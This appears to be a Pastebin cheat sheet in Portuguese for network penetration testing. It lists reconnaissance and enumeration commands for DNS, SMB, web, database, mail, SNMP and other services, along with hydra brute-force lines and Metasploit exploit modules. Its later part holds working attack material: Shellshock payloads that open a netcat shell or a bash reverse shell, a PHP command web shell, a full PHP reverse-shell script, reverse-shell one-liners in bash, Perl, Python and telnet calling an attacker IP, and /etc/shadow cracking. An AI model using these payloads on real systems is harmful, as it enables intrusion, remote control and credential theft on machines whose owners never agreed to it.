Advertisement
syst3m_h4x0r

Teste de penetração de rede

Jan 16th, 2019
24,782
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.46 KB | None | 0 0
  1. Encontre servidores de nomes
  2. $ host -t ns guif.re
  3. Encontre servidores de email
  4. $ host -t mx guif.re
  5. Bruteforcing subdomínio
  6. $ for ip in $(cat list.txt); do host $ip.guif.re; done
  7. Pesquisa reversa de DNS reverso
  8. $ for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
  9. Pedido de transferência de zona
  10. $ host -l guif.re ns1.guif.re
  11. $ dnsrecon -d guif.re -t axfr
  12. Localiza servidores de nomes para um determinado domínio
  13. $ host -t ns guif.re | cut -d " " -f 4 #
  14. $ dnsenum guif.re
  15. Varredura de transferência de zona Nmap
  16. $ nmap guif.re --script=dns-zone-transfer -p 53
  17. Localiza os nomes de domínio para um host.
  18. $ whois guif.re
  19. Encontre o IP e os servidores autorizados.
  20. $ nslookup guif.re
  21. Localiza entradas DNS de configuração incorreta.
  22. $ host -t ns guif.re
  23. TheHarvester encontra subdomínios no google, bing, etc
  24. $ python theHarvester.py -l 500 -b all -d guif.re
  25. Automatizado:
  26. #!/bin/bash
  27. nmap $1 -F # first, quick scan
  28. nmap -sV -A -O -T4 -sC $1 # verify services, Os, run scripts
  29. nmap -p 1-65535 -T5 -sT $1 # scan all ports TCP
  30. nmap -p 1-10000 -T4 -Su $1 # UDP scan
  31. Verificar todas as 65536 portas TCP / UDP, o nmap faz apenas 1000 primeiras portas por padrão
  32. Encontre anfitriões vivos
  33. nmap -sP 192.168.0.1/24
  34. Varredura de portas abertas (lenta)
  35. $ nmap -p 1-65535 -T4 -sS $ip
  36. Serviços encontrando enumeartion
  37. $ sudo nmap -sV -A -O -T4 $ip
  38. Varredura do aperto de mão 3way
  39. $ nmap -nvv -w 1 IP 22-8
  40. Varredura UDP
  41. $ nmap -nvv -sU -w 1 $ip 22-81
  42. A varredura UDP consiste em enviar um pacote UDP vazio. Aberto: responda de volta. Fechado: o pacote inacessível do ICMP é recebido
  43. ARP Scan
  44. $ arp-scan 10.10.10.1/28 -I eth0
  45. Varredura de ping do Nmap
  46. $ sudo nmap -sn -oA nmap_pingscan 10.10.10.1/24
  47. Nmap SYN / Top 100 portas de varredura
  48. $ nmap -sS -F -oA nmap_fastscan 10.10.10.1/24
  49. Varredura de versões de serviços
  50. $ nmap -sV $ip
  51. Execute os scripts padrão e a varredura de porta normal em todas as portas encontradas
  52. $ nmap -sC $ip
  53. Execute todos os scripts de varredura nmap contra as portas encontradas.
  54. $ nmap -Pn -sV -O -pT:{TCP ports found},U:{UDP ports found} --script *vuln* $ip
  55. Varredura de porta com relatório de arquivo:
  56. $ nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oA /root/192_168_15_201T 192.168.15.201
  57. Varredura completa de vulnerabilidades:
  58. $ mkdir /usr/share/nmap/scripts/vulnscan; cd /usr/share/nmap/scripts/vulnscan; git clone https://github.com/scipag/vulscan.git; nmap -sS -sV --script=/usr/share/nmap/scripts/vulnscan/vulscan.nse $ip
  59. Identifique serviços desconhecidos
  60. $ amap -d $ip <port>
  61. SMB
  62. Versões 1,2,3. TCP 139, 445 e muitas portas UDP.
  63. Enumeração
  64. $ nmblookup -A $ip
  65. $ enum4linux -a $ip
  66. Versões Samba 2.2.x são bandeira vermelha
  67. Uma sessão SMB nula pode ser usada para coletar senhas e informações úteis do SMB 1.
  68. Sessão nula e extrair informações.
  69. $ nbtscan -r $ip
  70. Versão
  71. msfconsole; use scanner/smb/smb_version; set RHOSTS $ip; run
  72. MultiExploit
  73. msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run
  74. Enum rápido:
  75. $ nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip
  76. Varredura vuln rápida:
  77. $ nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip
  78. Enum completo e varredura vuln:
  79. $ nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip
  80. Enum completo e varredura vuln:
  81. $ nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip
  82. Monte:
  83. $ smbclient //$ip/share -U username
  84. Montagem anônima:
  85. $ smbclient //$ip/share # hit enter with blank password
  86. Vale a pena testar eternalblue
  87. Bruteforce
  88. $ hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb
  89. Qualquer metaploit explorado através do Netbios sobre TCP em 139, você precisa definir:
  90. > set SMBDirect false
  91. Netbios
  92. Descarregando a tabela netbios:
  93. $ nmap -Pn -sUC -p137 $ip
  94. NFS
  95. Mostrar todas as montagens
  96. $ showmount -e $ip
  97. Montar um compartilhamento NFS
  98. $ mount $ip:/vol/share /mnt/nfs
  99. Rede
  100. $ nikto -host $ip
  101. $ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web_Content/Top1000-RobotsDisallowed.txt; gobuster -u http://$ip -w Top1000-RobotsDisallowed.txt
  102. $ wfuzz -c -z list.txt --sc 200 http://$ip
  103. Descoberta de diretório
  104. $ dirb $ip /usr/share/wordlists/dirb/common.txt
  105. $ gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
  106. $ gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
  107. $ gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e
  108. $ cd /root/dirsearch; python3 dirsearch.py -u http://$ip/ -e .php
  109. Bandeira, agarrar
  110. ./whatweb $ip # identifies all known services
  111. Teste de métodos
  112. $ nmap --script http-methods --script-args http-methods.url-path='/test' $ip
  113. Autenticação de Bruteforcing
  114. $ hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin
  115. Análise de vulnerabilidade:
  116. $ nikto -host http://$ip
  117. $ nmap --script=http-vuln* $ip
  118. Teste contra o SQLI
  119. sqlmap -u "http://$ip/?query" --data="user=foo&pass=bar&submit=Login" --level=5 --risk=3 --dbms=mysql
  120. Varredura de vulnerabilidade do ColdFusion
  121. $ nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip
  122. Autenticação Básica do Bruteforce
  123. $ hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
  124. WebDav
  125. teste
  126. $ davtest -move -sendbd auto -url http://$ip:8080/webdav/
  127. $ cadaver http://$ip:8080/webdav/
  128. Mysql
  129. $ nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306
  130. Varredura Nmap
  131. $ nmap -sV -Pn -vv -script=mysql* $ip -p 3306
  132. Varredura Vuln:
  133. $ sqlmap -u 'http://$ip/login-off.asp' --method POST --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all
  134. Se o Mysql está rodando como root e você tem acesso, você pode executar comandos:
  135. mysql> select do_system('id');
  136. mysql> \! sh
  137. MsSql
  138. Enumerar servidores MSSQL na rede
  139. msf > use auxiliary/scanner/mssql/mssql_ping
  140. $ nmap -sU --script=ms-sql-info $ip
  141. Bruteforce MsSql
  142. msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
  143. Ganhar shell usando credenciais reunidas
  144. msf > use exploit/windows/mssql/mssql_payload
  145. msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
  146. Faça o login em um servidor MsSql:
  147. # root@kali:~/dirsearch# cat ../.freetds.conf
  148. [someserver]
  149. host = $ip
  150. port = 1433
  151. tds version = 8.0
  152. user=sa
  153.  
  154. root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME
  155. Redis
  156. Enumerar:
  157. $ nmap -p6379 --script redis-info $ip
  158. Cliente:
  159. $ redis-cli -h $ip
  160. Memcached
  161. Enumerar:
  162. $ nmap -p11211 --script memcached-info $ip
  163. Extrair dados:
  164. msf > use auxiliary/gather/memcached_extractor
  165. SMTP
  166. Sempre fazer enumeração de usuários
  167. smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
  168. >use auxiliary/scanner/smtp/smtp_enum
  169. Comando para verificar se existe um usuário
  170. >VRFY root
  171. Comando para perguntar ao servidor se um usuário pertence a uma lista de discussão
  172. >EXPN root
  173. Enumeração e varredura vuln:
  174. $ nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
  175. Bruteforce
  176. $ hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
  177. Enumeração de usuário Metasploit
  178. use auxiliary/scanner/smtp/smtp_enum
  179. Teste para retransmissão aberta
  180. telnet $ip 25
  181. EHLO root
  182. MAIL FROM:root@target.com
  183. RCPT TO:example@gmail.com
  184. DATA
  185. Subject: Testing open mail relay.
  186. Testing SMTP open mail relay. Have a nice day.
  187. .
  188. QUIT
  189. RPC (135)
  190. Enumerar, mostra se alguma montagem do NFS foi exposta:
  191. $ rpcinfo -p $ip
  192. $ nmap $ip --script=msrpc-enum
  193. msf > use exploit/windows/dcerpc/ms03_026_dcom
  194. Enumeração FTP
  195. Enumerar:
  196. $ nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
  197. Bruteforce
  198. $ hydra -l user -P /usr/share/john/password.lst ftp://$ip:21
  199. Bruteforce com metasploit
  200. $ msfconsole -q
msf> search type:auxiliary login
msf> use auxiliary/scanner/ftp/ftp_login
  201. Varredura Vuln
  202. $ nmap --script=ftp-* -p 21 $ip
  203. TFTP
  204. Se o acesso não autenticado for permitido com permissões de gravação, você poderá fazer o upload de um shell:
  205. $ tftp $ip
  206. tftp> ls
  207. ?Invalid command
  208. tftp> verbose
  209. Verbose mode on.
  210. tftp> put shell.php
  211. Sent 3605 bytes in 0.0 seconds [inf bits/sec]
  212. SSH
  213. Enumeração de usuário
  214. msf > use auxiliary/scanner/ssh/ssh_enumusers
  215. $ python /usr/share/exploitdb/platforms/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip
  216. Bruteforce
  217. $ hydra -v -V -l root -P password-file.txt $ip ssh

  218. Com lista de usuários:
  219. $ hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 192.168.33.251 ssh
  220. Você pode usar * -w * para diminuir a velocidade
  221. SSL
  222. Abra uma conexão
  223. $ openssl s_client -connect $ip:443
  224. Verificação básica de cifras SSL
  225. $ nmap --script ssl-enum-ciphers -p 443 $ip
  226. Procure cifras inseguras como Triple-DES e Blowfish
  227. Ferramenta muito completa para auditoria de SSL é testssl.sh, encontra BEAST, FREAK, POODLE, heart bleed, etc ...
  228. Protocolo Simples de Gerenciamento de Rede (SNMP)
  229. É um protocolo de rede usado para coletar a organização e troca de informações entre dispositivos de rede
  230. Funciona em switches gerenciados, roteadores e SOs de servidor para fins de monitoramento. O SNMP é acessado ao fornecer uma string de comunidade válida dentro de um datagrama UDP para a porta 161. Geralmente, é público. Versões 1,2 e 3. Você pode ver os processos em execução, portas abertas, usuários, versão do Windows, software instalado.
  231. Enumeração
  232. $ for community in public private manager; do snmpwalk -c $community -v1 $ip; done
  233. $ snmpwalk -c public -v1 $ip
  234. $ snmpenum $ip public windows.txt
  235. Menos barulhento:
  236. $ snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25
  237. Baseado em UDP, sem estado e suscetível a spoofing UDP
  238. $ nmap -sU --open -p 16110.1.1.1-254 -oG out.txt
  239. $ snmpwalk -c public -v1 10.1.1.1 # we need to know that there is a community called public
  240. $ snmpwalk -c public -v 2c 10.1.1.1 # version 2
  241. *$ snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows users
  242. $ snmpwalk 5c public 5v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes
  243. $ nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip
  244. $ snmp-check -t $ip -c public
  245. Bruteforce os nomes da comunidade:
  246. $ onesixtyone -c dict.txt -i $ip
  247. Contra cisco:
  248. use auxiliary/scanner/snmp/cisco_config_tftp
  249. POP3
  250. Autenticação de teste:
  251. telnet $ip 110
  252. USER uer@$ip
  253. PASS admin
  254. list
  255. retr 1
  256. Dedo
  257. Enumeração de usuários
  258. $ finger-user-enum.pl -U users.txt -t $ip
  259. RDP
  260. Bruteforce
  261. $ ncrack -vv --user administrator -P password-file.txt rdp://$ip
  262. $ hydra -t 4 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
  263. RPC
  264. Enum
  265. $ nmap $ip --script=msrpc-enum
  266. Explorar:
  267. msf > use exploit/windows/dcerpc/ms03_026_dcom
  268. Kerberos
  269. Teste MS14-068
  270. LDAP
  271. Enumeração:
  272. $ ldapsearch -h $ip -p 389 -x -b "dc=mywebsite,dc=com"
  273. Kerberos
  274. É executado na porta 88, porta de gerenciamento de senha 464.
  275. Detecção de rede passiva:
  276. $ kerbcrack
  277. Enumeração do usuário:
  278. $ nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=research $ip
  279. Extração de senha de memória (passe o ticket):
  280. $ Mimikatz
  281. Enumeração de endereços de email
  282. Encontre e-mails no google, bing, pgp etc
  283. $ theharvester -d $ip -b google
  284. Informações de contato para os domínios que hospedam
  285. $ whois $ip
  286. Encontre e-mails e nome do funcionário com Recon-ng:
  287. $ recon-ng; use module; set DOMAIN $ip; run;
  288. recon/contacts/gather/http/api/whois_pocs
  289. Encontrar xss publicado ad xssed.co
  290. recon/hosts/enum/http/web/xssed
  291. Encontrar subdomínio
  292. recon/hosts/gather/http/web/google_site
  293. Localiza IPs próximos ao domínio e possíveis novos domínios
  294. recon/hosts/gather/http/web/ip_neighbor
  295. pesquisa do Google
  296. site: xxx -site: www.xxx
  297. filetype: procure documentos específicos, pdf, docx, etc.
  298. inurl
  299. intitle
  300. Outros https://www.exploit-db.com/google-hacking-database/
  301. Análise de vulnerabilidade
  302. Vulnerabilidades de serviços de pesquisa
  303. $ searchsploit --exclude=dos -t apache 2.2.3
  304. $ msfconsole; > search apache 2.2.3
  305. $ nmap -v -T4 --script="*-vuln-*" $ip
  306. O nmap possui muitos scripts NSE de varredura de vulnerabilidades em / usr / share / nmap / scripts /
  307. OpenVAS
  308. Scanner de vulnerabilidade poderoso com milhares de verificações de digitalização. Configuração:
  309. $ openvas-setup; openvas-adduser; gsd
  310. Quebra de senha
  311. MD5 32 caracteres hexadecimais.
  312. SHA-1 40 caracteres hexadecimais.
  313. SHA-256 64 caracteres hexadecimais.
  314. SHA-512 128 caracteres hexadecimais.
  315. Encontre o tipo de hash:
  316. $ hash-identifier
  317. Encontre o tipo de hash em https://hashkiller.co.uk
  318. Rodar o john irá dizer-lhe o tipo de hash, mesmo que você não queira quebrá-lo:
  319. $ john hashes.txt
  320. Cole o arquivo / etc / shadow inteiro no arquivo e execute
  321. $ john hashes.txt
  322. Cole o arquivo / etc / shadow inteiro no arquivo e execute
  323. $ john hashes.txt
  324. Quebra de GPU:
  325. $ hashcat -m 500 -a 0 -o output.txt -remove hashes.txt /usr/share/wordlists/rockyou.txt
  326. Cisão da CPU:
  327. $ john --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
  328. Craqueamento * / etc / shadow *:
  329. $ unshadow /etc/passwd /etc/shadow /tmp/combined; john --wordlist=<any word list> /tmp/combined
  330. Gerando listas de palavras
  331. $ crunch 6 6 0123456789ABCDEF 5o crunch1.txt
  332. Tabelas online de arco-íris:
  333. https://crackstation.net/
  334. http://www.cmd5.org/
  335. http://crackhash.com/
  336. https://hashkiller.co.uk/md5-decrypter.aspx
  337. https://www.onlinehashcrack.com/
  338. http://rainbowtables.it64.com/
  339. http://www.md5online.org/
  340. Transferindo arquivos
  341. O primeiro passo depois de obter acesso a uma máquina remota é fazer o upload de novas ferramentas.
  342. Ferramentas do Linux: netcat, curl, wget
  343. Windows: ftp, tftp, script de shell de energia para ecoar e escrever.
  344. Faça o download do arquivo com curl:
  345. $ curl -O http://host/file
  346. Carregar um arquivo com put:
  347. $ curl --upload-file shell.php --url http://$ip/shell.php --http1.0
  348. Inicie um servidor da web em seus arquivos de veiculação da máquina local na pasta atual:
  349. $ python -m SimpleHTTPServer
  350. $ php -S $ip:80
  351. Envie arquivos usando comandos diferentes:
  352. $ nc -nlvp 4444 > incoming.exe
  353. Como um servidor FTP, o metasploit foi construído em um:
  354. use auxiliary/server/ftp
  355. auxiliary/server/tftp
  356. Servidor de compartilhamento SMB:
  357. python smbserver.py WORKSPACE /dir
  358. Curl colocar:
  359. $ curl -T 'file' 'http://$ip'
  360. Linux, montando um compartilhamento de samba:
  361. smbclient -L 1.1.1.1 --no-pass
  362. Trauma pós guerra
  363. A ferramenta a seguir irá testá-lo.
  364. $ git clone https://github.com/nccgroup/shocker; cd shocker; ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose; ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose
  365. Você também pode:
  366. $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc $ip 80
  367. $ curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" $ip/cgi-bin/status
  368. Shellshock sobre SSH:
  369. $ ssh username@$ip '() { :;}; /bin/bash'
  370. HeartBleed
  371. Testar servidor da web
  372. $ sslscan $ip:443
  373. Tunelando seu tráfego através de outro host
  374. $ sshuttle -r root@$ip 10.10.10.0/24
  375. Encaminhamento de porta
  376. O tipo mais simples de redirecionamento de tráfego consiste em aceitar tráfego de um endereço e porta de porta e redirecioná-lo para outro endereço e porta.
  377. Pode ser útil ignorar filtros baseados em endereços e portas. O Rinetd é uma ferramenta do Linux para fazer isso.
  378. Encaminhamento de porta local
  379. Cria um encapsulamento criptografado por meio de duas máquinas e redireciona o tráfego para um host e uma porta final, semelhante ao encaminhamento de porta. Isso é útil quando você está tentando se conectar da sua máquina a um destino usando um gateway. A sintaxe é:
  380. $ ssh gateway_host -L local_port:remote_host:remote_port
  381. Mais tarde, você pode criar uma sessão SSH para a porta local e ter um SSH encapsulado no destino:
  382. $ ssh hop_machine -L 31337:banned_machine:22
  383. $ ssh -p 31337 localhost
  384. Encaminhamento de porta remota
  385. Ele cria um túnel a partir da máquina de destino para sua máquina local, o que permite conectar-se a uma porta arbitrária no destino. Útil se o destino estiver em uma rede não roteável de sua máquina local. Isso é útil quando você está tentando se conectar a um host, atrás de um firewall que bloqueia conexões de entrada. Essa técnica funciona como a anterior, mas a conexão é iniciada a partir do gateway. A sintaxe é:
  386. $ ssh <gateway> -R <remote port to bind>:<local host>:<local port>
  387. Encaminhamento Dinâmico de Portas
  388. Permite criar um túnel a partir do destino para sua máquina e ter o tráfego roteado para qualquer host por meio do destino. Você pode configurar uma porta local para encaminhar o tráfego para vários destinos passando por um único host. É semelhante ao encaminhamento de porta local, mas permite vários destinos. Ele usa o protocolo SOCKS. A sintaxe é:
  389. $ ssh -D local_port remote_add
  390. A conexão do comando anterior é estabelecida na porta 22 do addr remoto.
  391. Pivotante
  392. 1. solte 3proxy.exe
  393. 2. Configure um arquivo de configuração:
  394. allow *_
  395. internal IP_SAME_NETWORK
  396. external IP_OTHER_NETWORK
  397. socks -p1081
  398. 3. Adicione a * / etc / proxychains.conf *:
  399. socks4 IP_SAME_NETWORK 1081
  400. 4. Digitalize:
  401. $ proxychains nmap -sT -Pn IP_OTHER_NETWORK-250 --top-ports=5
  402. Duplo giro
  403. Girando através de duas redes diferentes:
  404. Primeiro, crie um encaminhamento de porta dinâmico pela primeira rede:
  405. $ ssh -f -N -D 9050 root@10.1.2.1
  406. Edite * / etc / proxychains.conf * e adicione como gateway padrão:
  407. socks4 127.0.0.1 9050
  408. Use o proxy para criar uma segunda porta dinâmica para a segunda rede:
  409. $ proxychains ssh -f -N -D 10050 root@10.1.2.1 -p 22
  410. Edite novamente * / etc / proxychains.conf * e adicione como gateway padrão:
  411. socks4 127.0.0.1 10050
  412. Agora você pode usar proxychains para dinamizar a rede de destino:
  413. $ proxychains nmap -sTV -n -PN 10.1.2.1 -254
  414. CVEs
  415. http://www.cvedetails.com/
  416. https://www.exploit-db.com/
  417. Internet Explorer 6
  418. Vulnerável à exploração msf (ms10_002_aurora)
  419. Listas
  420. /usr/share/seclists/
  421. /usr/share/wordlist/
  422. /usr/share/metasploit-framework/data/wordlists/
  423. Servidor web mínimo
  424. $ for i in 1 2 3 4 5 6 7; do echo -e '200 OK HTTP/1.1\r\nConnection:close\r\n\r\nfoo\r\n' |nc -q 0 -klvvp 80; done
  425. Cartuchos
  426. PHP
  427. <?php echo '<pre>'; echo shell_exec($_GET['cmd']); echo '</pre>'; ?>
  428. Conchas de Kali
  429. /usr/share/webshells/...
  430. /usr/share/webshells/php/php-reverse-shell.php
  431. Conchas reversas
  432. Se as conexões caírem ou não puderem ser estabelecidas, tente portas diferentes 80,443,8080 ...
  433. Melhor shell reverso do PHP:
  434. <?php
  435. echo 'running shell';
  436. $ip='YOUR_IP';
  437. $port='YOUR_PORT';
  438. $reverse_shells = array(
  439. '/bin/bash -i > /dev/tcp/'.$ip.'/'.$port.' 0<&1 2>&1',
  440. '0<&196;exec 196<>/dev/tcp/'.$ip.'/'.$port.'; /bin/sh <&196 >&196 2>&196',
  441. '/usr/bin/nc '.$ip.' '.$port.' -e /bin/bash',
  442. 'nc.exe -nv '.$ip.' '.$port.' -e cmd.exe',
  443. "/usr/bin/perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"".$ip.":".$port."\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
  444. 'rm -f /tmp/p; mknod /tmp/p p && telnet '.$ip.' '.$port.' 0/tmp/p',
  445. 'perl -e \'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''
  446. );
  447. foreach ($reverse_shells as $reverse_shell) {
  448. try {echo system($reverse_shell);} catch (Exception $e) {echo $e;}
  449. try {shell_exec($reverse_shell);} catch (Exception $e) {echo $e;}
  450. try {exec($reverse_shell);} catch (Exception $e) {echo $e;}
  451. }
  452. system('id');
  453. ?>
  454. Usando o netcat
  455. nc <attacker_ip> <port> -e /bin/bash
  456. Usando bash e soquetes TCP
  457. /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
  458. Usando sh e soquetes TCP
  459. 0<&196;exec 196<>/dev/tcp/<attacker_ip>/<port>; sh <&196 >&196 2>&196
  460. Usando telnet
  461. telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
  462. PHP e sh
  463. php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
  464. Perl e sh
  465. perl -e 'use Socket;$i="<attacker_ip>";$p=<port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  466. Bifurcação Perl:
  467. $ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  468. Python
  469. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  470. Inversa shell com script de python:
  471. #!/usr/bin/python
  472. import socket,subprocess,os
  473. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  474. s.connect(("IP",port))
  475. os.dup2(s.fileno(),0)
  476. os.dup2(s.fileno(),1)
  477. os.dup2(s.fileno(),2)
  478. p=subprocess.call(["/bin/sh","-i"])
  479. Proxy
  480. Protocolos
  481. http://
  482. http://
  483. connect://
  484. sock4://
  485. sock5://
  486. PPTP
  487. O protocolo de encapsulamento ponto-a-ponto fornece acesso remoto a dispositivos móveis, usa a porta TCP 1723 para troca de chaves e o protocolo IP 47 (GRE) para criptografar dados entre pares.
  488. Enumeração:
  489. $ nmap –Pn -sSV -p1723 $ip
  490. Bruteforce:
  491. $ cat dic.txt | thc-pptp-bruter –u admin $ip
  492. IPsec
  493. Tenta resolver os problemas de confidencialidade / integridade do protocolo IP. Ele fornece HMAC da origem e criptografa os dados.
  494. Você pode encontrar hosts que suportem o Ipsec com:
  495. $ ike-scan -q $iprange
  496. Valide o seguinte:
  497. O grupo DH pode ser inseguro, permitindo a decifração passiva.
  498. A chave pré-compartilhada (PSK) pode estar quebrada.
  499. Obtendo o XAUTH uma vez que o PSK é conhecido.
  500. Para mais informações, consulte https://www.trustwave.com/Resources/SpiderLabs-Blog/Cracking-IKE-Mission-Improbable-(Part-1)/ .
  501. TLS
  502. Enumerando Protocolos Suportados e Conjuntos de Cifras
  503. $ python prober.py $ip
  504. Enumerando recursos e extensões suportados
  505. $ nmap --script ssl-enum-ciphers -p443
  506. Revisão de certificado
  507. $ nmap -p443 --script ssl-cert
  508. Você deve validar isso:
  509. O nome comum (CN) do assunto X.509 está correto para o serviço
  510. O emissor é respeitável e a cadeia de certificados é válida
  511. Os valores de chave pública RSA ou DSA são maiores que 2.048 bits
  512. Os parâmetros públicos de DH são maiores que 2.048 bits
  513. O certificado é válido e não expirou
  514. O certificado é assinado usando o SHA-256
  515. Vulnerabilidades:
  516. POODLE contra cifras do modo CBC dentro do SSL 3.0
  517. BEAST contra cifras do modo CBC via TLS 1.0
  518. Bytes de bytes em cifras RC4 em todas as versões do protocolo SSL e TLS
  519. Valide se a chave foi gerada com entropia fraca:
  520. $ nmap -p443 --script ssl-known-key $1
  521. Teste de failback:
  522. $ openssl s_client -connect $ip -no_tls1_2 -fallback_scsv
  523. Teste Dos:
  524. $ thc-ssl-dos $ip
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement